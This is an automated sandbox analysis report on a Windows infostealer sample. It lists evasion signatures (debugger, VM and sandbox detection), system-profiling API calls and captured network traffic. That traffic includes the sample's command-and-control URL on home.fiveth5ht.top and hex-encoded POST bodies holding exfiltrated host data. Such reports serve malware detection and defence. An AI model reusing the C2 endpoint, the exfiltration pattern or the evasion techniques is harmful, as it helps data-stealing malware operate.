Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
w6cYYyWXqJ.exe

Overview

General Information

Sample name:w6cYYyWXqJ.exe
renamed because original name is a hash value
Original sample name:26e7c91d9fb68ef0ce54aabc0465a8b0.exe
Analysis ID:1581212
MD5:26e7c91d9fb68ef0ce54aabc0465a8b0
SHA1:a2b0aee031cbd7f67d4f86c45354a2715ca0c25c
SHA256:23569c1720e9dd2b72da3ea832f2a0029c29c8d6b5f3e50caefed0dcbaa605ac
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • w6cYYyWXqJ.exe (PID: 1008 cmdline: "C:\Users\user\Desktop\w6cYYyWXqJ.exe" MD5: 26E7C91D9FB68EF0CE54AABC0465A8B0)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: w6cYYyWXqJ.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: w6cYYyWXqJ.exeVirustotal: Detection: 33%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: w6cYYyWXqJ.exeJoe Sandbox ML: detected
Source: w6cYYyWXqJ.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: mov dword ptr [ebp+04h], 424D53FFh3_2_00EEA5B0
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: mov dword ptr [ebx+04h], 424D53FFh3_2_00EEA7F0
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: mov dword ptr [edi+04h], 424D53FFh3_2_00EEA7F0
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: mov dword ptr [esi+04h], 424D53FFh3_2_00EEA7F0
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: mov dword ptr [edi+04h], 424D53FFh3_2_00EEA7F0
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: mov dword ptr [esi+04h], 424D53FFh3_2_00EEA7F0
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: mov dword ptr [ebx+04h], 424D53FFh3_2_00EEA7F0
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: mov dword ptr [ebx+04h], 424D53FFh3_2_00EEB560
Source: w6cYYyWXqJ.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_00E8255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,3_2_00E8255D
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_00E829FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,3_2_00E829FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 561951Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 39 38 32 31 37 36 35 32 39 31 33 39 38 35 38 39 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 30 34 20 7d 2c 2
Source: global trafficHTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1Host: home.fiveth5ht.topAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_00F4A8C0 recvfrom,3_2_00F4A8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1Host: home.fiveth5ht.topAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknownHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 561951Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 39 38 32 31 37 36 35 32 39 31 33 39 38 35 38 39 31 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 30 34 20 7d 2c 2
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 07:38:22 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 07:38:24 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
Source: w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
Source: w6cYYyWXqJ.exe, 00000003.00000002.1489724133.0000000007470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQ
Source: w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: w6cYYyWXqJ.exe, 00000003.00000003.1453682176.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1453663304.0000000000B42000.00000004.00000020.00020000.00000000.sdmp, w6cYYyWXqJ.exe, 00000003.00000002.1483267800.0000000000B49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: w6cYYyWXqJ.exe, 00000003.00000002.1483886052.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1452487923.0000000000B51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0
Source: w6cYYyWXqJ.exe, 00000003.00000002.1483886052.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1452487923.0000000000B51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0e6
Source: w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: w6cYYyWXqJ.exe, 00000003.00000003.1453682176.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1453663304.0000000000B42000.00000004.00000020.00020000.00000000.sdmp, w6cYYyWXqJ.exe, 00000003.00000002.1483267800.0000000000B49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862lse
Source: w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
Source: w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: w6cYYyWXqJ.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: w6cYYyWXqJ.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: w6cYYyWXqJ.exe, w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: w6cYYyWXqJ.exe, 00000003.00000003.1331595263.0000000000B67000.00000004.00000020.00020000.00000000.sdmp, w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
Source: w6cYYyWXqJ.exe, 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmp, w6cYYyWXqJ.exe, 00000003.00000003.1301368637.00000000072A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443

System Summary

barindex
PE file contains section with special chars
Source: w6cYYyWXqJ.exeStatic PE information: section name:
Source: w6cYYyWXqJ.exeStatic PE information: section name: .idata
Source: w6cYYyWXqJ.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_00E905B03_2_00E905B0
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_00E96FA03_2_00E96FA0
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_00F4B1803_2_00F4B180
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_00EBF1003_2_00EBF100
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_00F500E03_2_00F500E0
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_0120A0003_2_0120A000
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_0120E0503_2_0120E050
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_00EE62103_2_00EE6210
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_00F4C3203_2_00F4C320
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_00F504203_2_00F50420
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_011D44103_2_011D4410
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_011E67303_2_011E6730
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_012047803_2_01204780
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_00E8E6203_2_00E8E620
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_00EEA7F03_2_00EEA7F0
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_00F4C7703_2_00F4C770
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_00E8A9603_2_00E8A960
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_00E949403_2_00E94940
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_00F3C9003_2_00F3C900
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_0113AB2C3_2_0113AB2C
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_01014B603_2_01014B60
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_011F8BF03_2_011F8BF0
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_00E8CBB03_2_00E8CBB0
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_01056AC03_2_01056AC0
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_0113AAC03_2_0113AAC0
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_01204D403_2_01204D40
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_011FCD803_2_011FCD80
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_0120CC903_2_0120CC90
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_011D2F903_2_011D2F90
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_0119AE303_2_0119AE30
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_00F4EF903_2_00F4EF90
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_00F48F903_2_00F48F90
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_00EA4F703_2_00EA4F70
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_00E910E63_2_00E910E6
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_011F35B03_2_011F35B0
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_011ED4303_2_011ED430
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_012117A03_2_012117A0
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_011D56D03_2_011D56D0
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_011D99203_2_011D9920
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_00F398803_2_00F39880
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_011F1BD03_2_011F1BD0
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_00EC1BE03_2_00EC1BE0
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_01203A703_2_01203A70
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: String function: 00E9CCD0 appears 53 times
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: String function: 01037220 appears 91 times
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: String function: 00E9CD40 appears 73 times
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: String function: 00E8CAA0 appears 62 times
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: String function: 00EC50A0 appears 86 times
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: String function: 0105CBC0 appears 94 times
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: String function: 00E871E0 appears 44 times
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: String function: 00EC4F40 appears 302 times
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: String function: 00E873F0 appears 107 times
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: String function: 00E875A0 appears 633 times
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: String function: 00EC5340 appears 45 times
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: String function: 00F644A0 appears 62 times
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: String function: 00E8C960 appears 32 times
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: String function: 00EC4FD0 appears 239 times
Source: w6cYYyWXqJ.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: w6cYYyWXqJ.exeStatic PE information: Section: bzvzmdre ZLIB complexity 0.9944616347353105
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_00E8255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,3_2_00E8255D
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeCode function: 3_2_00E829FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,3_2_00E829FF
Source: C:\Users\user\Desktop\w6cYYyWXqJ.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
